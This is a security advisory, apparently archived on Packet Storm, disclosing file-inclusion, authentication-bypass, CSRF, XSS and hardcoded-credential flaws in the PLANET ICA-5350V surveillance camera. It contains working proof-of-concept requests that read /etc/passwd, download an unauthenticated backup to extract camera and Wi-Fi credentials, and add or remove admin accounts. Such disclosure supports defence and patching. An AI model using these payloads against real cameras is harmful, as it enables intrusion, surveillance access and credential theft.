what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

PLANET IP ICA-5350V LFI / XSS / CSRF / Bypass

PLANET IP ICA-5350V LFI / XSS / CSRF / Bypass
Posted Feb 22, 2016
Authored by GT.Omaz

PLANET IP surveillance camera model ICA-5350V suffers from authentication bypass, cross site request forgery, cross site scripting, arbitrary file read, hardcoded credential, and local file inclusion vulnerabilities.

tags | exploit, arbitrary, local, vulnerability, xss, bypass, file inclusion, csrf
SHA-256 | 9760b0ddcfb05af2b4f17976ad5b7b98e7d7ce2e5fee368b40236d57d5e5a7b7

PLANET IP ICA-5350V LFI / XSS / CSRF / Bypass

Change Mirror Download
Overview
=======
Technical Risk: high
Likelihood of Exploitation: medium
Tested version: ICA-5350V/ICA-*
Credits: Discovered and researched by GT.Omaz from OrwellLabs

Issues
=====
I. Local File Inclusion
II. Arbitrary file read/Authentication bypass
III. Sensitive information disclosure
IV. Cross-site request forgery
V. Reflected Cross-site scripting
VI. hardcoded credentials


I. Local File Inclusion
================

The Web Management interface of PLANET IP surveillance Cam model ICA-5350V
(and probably some other models, maybe ICA-*)
is prone to Local File Include (LFI).

POC
------
The request bellow is generated when a new user is added, in this case
we are adding the following administrative credential for the cam:
"root:r00tx".


GET /cgi-bin/admin/querylogin.cgi HTTP/1.1
Host: {xxx.xxx.xxx.xxx}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:42.0) Gecko/20100101
Firefox/42.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer:
*http://{xxx.xxx.xxx.xxx}/cgi-bin/admin/usrgrp.cgi?user=root&pwd=r00tx&grp=administrator&sgrp=ptz&action=add&redirect=asp%2Fuser.asp
*
Cookie: ipcam_profile=1; tour_index=-1; IsHideStreamingStatus=yes
Authorization: Basic YdRRtXW41YXRtad4=
Connection: keep-alive
If-Modified-Since: Mon, 08 Jul 2013 11:10:26 GMT


If the value of the parameter "redirect" was changed to any system file
will return the contents of that file, as shown below:
http://
{xxx.xxx.xxx.xxx}/cgi-bin/admin/usrgrp.cgi?user=root&pwd=r00tx&grp=administrator&sgrp=ptz&action=add&
*redirect=/etc/passwd *

In this case will retrieved the content of /etc/passwd


II. Arbitrary file read/Authentication bypass
================================
The camera offers a feature to perform the download settings via a backup
file. However,
(how acess control is not effective) this file remains accessible via the
browser for an unauthenticated user.

POC
-----
wget --no-check-certificate https://{xxx.xxx.xxx.xxx}/backup.tar.gz
tar -xzvf backup.tar.gz
cat tmp/sysConfig/sysenv.cfg|strings|fmt|cut -f8,9 -d" "

It will return the credential to access the camera

Through this vulnerability a user can also obtain the credential of the AP
to which the camera is connected just parsing
the file: 'tmp/sysConfig/extra.info'


III. Sensitive information disclosure
===========================
Using LFI vulnerability report, a user can obtain sensitive information
such as username and password by reading the log file, as follows:

{xxx.xxx.xxx.xxx}/cgi-bin/admin/usrgrp.cgi?user=&pwd=&grp=&sgrp=&action=&redirect=/var/log/messages


IV. Cross-site request forgery
======================
Planet IP cams ICA-* are prone to Multple CSRF.

POC
------

- This will create a admin credential: root:r00tx

<html>
<!-- CSRF PoC - -->
<body>
<form action="http://
{xxx.xxx.xxx.xxx}/setup.cgi?language=ie&adduser=root:r00tx:1">
<input type="submit" value="Submit form" />
</form>
</body>
</html>

- ICA-5350V


<html>
<!-- CSRF PoC -->
<body>
<form action="http://
{xxx.xxx.xxx.xxx}/cgi-bin/admin/usrgrp.cgi?user=root&pwd=r00tx&grp=administrator&sgrp=ptz&action=add&redirect=asp%2Fuser.asp">
<input type="submit" value="Submit form" />
</form>
</body>
</html>

- Del user root

<html>
<!-- CSRF PoC -->
<body>
<form action="http://
{xxx.xxx.xxx.xxx}/cgi-bin/admin/usrgrp.cgi?user=root&pwd=r00tx&grp=administrator&sgrp=ptz&action=remove&redirect=asp%2Fuser.asp">
<input type="submit" value="Submit form" />
</form>
</body>
</html>


V. Cross-Site Scripting
=================
Cams models ICA-* are prone to Multiple XSS

POC
-------
http://{xxx.xxx.xxx.xxx}/setup.cgi?<script>alert("XSS")</script>

this will pop-up the message XSS in the browser


VI. hardcoded credentials
====================

The credentials of web management can be found just viewing the source of
page default_nets.htm:

POC
------
https://{xxx.xxx.xxx.xxx}/default_nets.htm

code:

}

function av_onload(){
CheckMobileMode();
util_SetUserInfo();
Loadplay();
watchdog();
//alert("watchdog");
}
function Loadplay(){
play("*MasterUsr","MasterPwd*
","554",parseInt("99"),parseInt("99"),"1",parseInt("2"),parseInt("0"),"192.168.1.99","");
}


Timeline
=======
2015-10-02 - Issues discovered
2015-11-30 - Vendor contacted (advisore sent)
2015-12-16 - Vendor contacted (asking for feedback about reported issues)
2015-12-17 - Vendor response (asking for more time to check issues)
2015-12-21 - RD team replied: can't duplicate vulnerabilities....
2016-01-13 - Vendor contacted (submitted evidence that the vulnerabilities
persist and can be reproduced.)
...and no news after that...


Login or Register to add favorites

File Archive:

June 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    19 Files
  • 2
    Jun 2nd
    16 Files
  • 3
    Jun 3rd
    28 Files
  • 4
    Jun 4th
    0 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    19 Files
  • 7
    Jun 7th
    23 Files
  • 8
    Jun 8th
    11 Files
  • 9
    Jun 9th
    10 Files
  • 10
    Jun 10th
    4 Files
  • 11
    Jun 11th
    0 Files
  • 12
    Jun 12th
    0 Files
  • 13
    Jun 13th
    0 Files
  • 14
    Jun 14th
    0 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    27 Files
  • 20
    Jun 20th
    65 Files
  • 21
    Jun 21st
    10 Files
  • 22
    Jun 22nd
    8 Files
  • 23
    Jun 23rd
    6 Files
  • 24
    Jun 24th
    6 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    15 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close